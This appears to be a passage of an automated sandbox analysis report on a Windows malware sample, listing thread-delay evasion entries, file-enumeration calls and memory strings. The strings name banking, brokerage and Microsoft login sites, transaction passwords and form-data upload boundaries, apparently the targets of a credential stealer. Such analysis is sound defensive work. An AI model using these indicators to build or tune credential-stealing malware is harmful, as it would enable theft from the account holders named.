Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598449	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594624	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7337			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2380			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6204	Thread sleep count: 1510 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6204	Thread sleep count: 8344 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598561s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598449s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596702s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604	Thread sleep time: -594624s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598449	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594624	Jump to behavior

Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: powershell.exe, 00000002.00000002.2652429472.0000000005626000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\]q
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd1ff686aa7ee1<
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3309207885.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309207885.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: powershell.exe, 00000002.00000002.2652429472.0000000005626000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\]q
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd2020b9ee5469<
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3309207885.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: powershell.exe, 00000002.00000002.2652429472.0000000005626000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\]q
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
